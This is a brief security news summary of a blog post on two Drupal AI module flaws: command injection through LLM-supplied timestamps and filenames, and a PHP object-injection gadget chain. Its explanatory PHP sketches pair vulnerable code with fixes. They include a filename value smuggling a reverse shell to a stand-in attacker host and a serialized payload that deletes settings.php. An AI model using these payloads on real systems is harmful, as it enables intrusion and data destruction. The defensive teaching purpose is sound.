Analysis of Past Security Flaws in Drupal AI Module Highlights LLM Risks
Drew Webber’s detailed blog post from May 2025 unpacks CVE-2025-3169, a Remote Code Execution flaw in Drupal’s AI Automators submodule. Originally disclosed in March, the vulnerability allowed shell command injection via LLM-generated timestamps and unsanitized filenames, with examples showing how attackers could gain a reverse shell through PHP’s `exec()`.
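As a rough illustration of this bug class, here is a minimal sketch with invented function names (not the AI Automators code Webber analyzes), showing what happens when an LLM-supplied timestamp and an uploaded filename are spliced directly into a shell command:

```php
<?php
// Hypothetical sketch of the vulnerability class, not the AI module's actual code.
// An LLM-supplied timestamp and an uploaded filename reach a shell command,
// so metacharacters in either value become shell syntax.

function cut_video_unsafe(string $filename, string $timestamp): void {
    // VULNERABLE: neither value is escaped. A filename such as
    // "clip.mp4; bash -i >& /dev/tcp/attacker/4444 0>&1" (or an LLM
    // "timestamp" containing $(...)) executes arbitrary commands.
    exec("ffmpeg -ss {$timestamp} -i {$filename} out.mp4");
}

function cut_video_safe(string $filename, string $timestamp): void {
    // SAFER: validate the LLM output against the expected format and
    // shell-escape anything that must reach the command line.
    if (!preg_match('/^\d{2}:\d{2}:\d{2}$/', $timestamp)) {
        throw new InvalidArgumentException('Unexpected timestamp from LLM.');
    }
    exec('ffmpeg -ss ' . escapeshellarg($timestamp)
        . ' -i ' . escapeshellarg($filename) . ' out.mp4');
}
```

The safer variant treats the LLM exactly like any other untrusted user, validating its output before use, which is the broader lesson of the post.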
A second issue, CVE-2025-31693, involved a PHP “gadget chain” in which object injection could trigger arbitrary file deletion or command execution. The analysis underscores the risks of blindly trusting LLM output and unsanitized user input in shell-based workflows.
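For readers unfamiliar with the term, here is a generic PHP sketch of how a gadget chain works; the class name and payload are invented for illustration and are not the gadget Webber documents:

```php
<?php
// Generic PHP object-injection sketch (invented class name, not the actual
// Drupal gadget chain). A "gadget" is an existing class whose magic method
// does something dangerous with attacker-controlled properties.

class TempFileCleaner {
    public string $path = '';

    // Runs automatically when the object is garbage-collected, including
    // objects created by unserialize(). An attacker who controls $path
    // turns this cleanup helper into an arbitrary-file-deletion primitive.
    public function __destruct() {
        if ($this->path !== '' && file_exists($this->path)) {
            unlink($this->path);
        }
    }
}

// VULNERABLE: unserializing untrusted input lets the attacker instantiate
// any available class with properties of their choosing.
$payload = 'O:15:"TempFileCleaner":1:{s:4:"path";s:21:"/var/www/settings.php";}';
unserialize($payload); // __destruct() fires and deletes the target file.

// SAFER: forbid object instantiation when deserializing untrusted data.
unserialize($payload, ['allowed_classes' => false]);
```

Real-world chains typically link several such classes together, but the core mechanism is the same: `unserialize()` on untrusted data hands the attacker control over object state, and magic methods do the rest.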
Though more than a month old, this post remains relevant given the increasing use of AI integrations in Drupal. Webber’s walkthrough of the exploit mechanics and the remediation (shipped in AI module version 1.0.5) offers valuable lessons for anyone building or securing Drupal automation features.